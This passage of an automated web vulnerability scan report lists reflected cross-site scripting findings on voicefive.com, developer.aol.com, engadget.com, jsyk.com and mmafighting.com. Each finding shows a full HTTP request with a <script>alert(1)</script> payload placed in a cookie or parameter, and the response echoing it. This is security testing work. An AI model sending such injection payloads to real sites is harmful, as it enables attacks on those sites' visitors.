Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&bcd1d<script>alert(1)</script>3f482f6797c; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557108%2E102%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:59:35 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=35&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:59:35 2011&prad=253735225&arc=206438317&; expires=Wed 03-Aug-2011 00:59:35 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25826

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735225",Pid:"p97174789",Arc:"206438317",Location:
...[SNIP]...
D%3E%2D1%2Cts%2D%3E1304557108%2E102%2Cwait%2D%3E10000%2C', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&bcd1d<script>alert(1)</script>3f482f6797c', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.228. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload cf13e<script>alert(1)</script>d0bbd35541 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&cf13e<script>alert(1)</script>d0bbd35541; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25609

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&cf13e<script>alert(1)</script>d0bbd35541', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

5.229. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload f38a5<script>alert(1)</script>c393d546009 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&f38a5<script>alert(1)</script>c393d546009; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&f38a5<script>alert(1)</script>c393d546009', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.230. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 5becf<script>alert(1)</script>85729a22e32 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&5becf<script>alert(1)</script>85729a22e32; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
r 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&5becf<script>alert(1)</script>85729a22e32', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.231. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload fc0a6<script>alert(1)</script>d6163573ab8 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&fc0a6<script>alert(1)</script>d6163573ab8; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&fc0a6<script>alert(1)</script>d6163573ab8=&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&fc0a6<script>alert(1)</script>d6163573ab8', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 201
...[SNIP]...

5.232. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload d4cb0<script>alert(1)</script>579600faeb2 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1d4cb0<script>alert(1)</script>579600faeb2; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
Exp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1d4cb0<script>alert(1)</script>579600faeb2', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.233. http://developer.aol.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1014e"><script>alert(1)</script>19aa03eba79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?1014e"><script>alert(1)</script>19aa03eba79=1 HTTP/1.1
Host: developer.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304610976566-Repeat%7C1367682976566%3B%20s_nrgvo%3DRepeat%7C1367682976568%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 11:10:45 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:40:45 GMT
Content-length: 131
Content-type: text/html
Location: http://dev.aol.com/?1014e"><script>alert(1)</script>19aa03eba79=1

<html>
<body>
Page relocated <a href="http://dev.aol.com/?1014e"><script>alert(1)</script>19aa03eba79=1">here.</a>
</body>
</html>

5.234. http://engadget.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a375"><script>alert(1)</script>5b25a3ca0a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?9a375"><script>alert(1)</script>5b25a3ca0a2=1 HTTP/1.1
Host: engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:53:01 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:23:01 GMT
Content-length: 136
Content-type: text/html
Location: http://www.engadget.com/?9a375"><script>alert(1)</script>5b25a3ca0a2=1
Keep-Alive: timeout=5, max=33
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.engadget.com/?9a375"><script>alert(1)</script>5b25a3ca0a2=1">here.</a>
</body>
</html>

5.235. http://jsyk.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsyk.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba5ed"><script>alert(1)</script>9ef0ad39b64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?ba5ed"><script>alert(1)</script>9ef0ad39b64=1 HTTP/1.1
Host: jsyk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:53:16 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:23:16 GMT
Content-length: 132
Content-type: text/html
Location: http://www.jsyk.com/?ba5ed"><script>alert(1)</script>9ef0ad39b64=1
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.jsyk.com/?ba5ed"><script>alert(1)</script>9ef0ad39b64=1">here.</a>
</body>
</html>

5.236. http://mmafighting.com/traffic/ [bv parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the bv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8c6"><script>alert(1)</script>ece380801f8 was submitted in the bv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=2c8c6"><script>alert(1)</script>ece380801f8&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
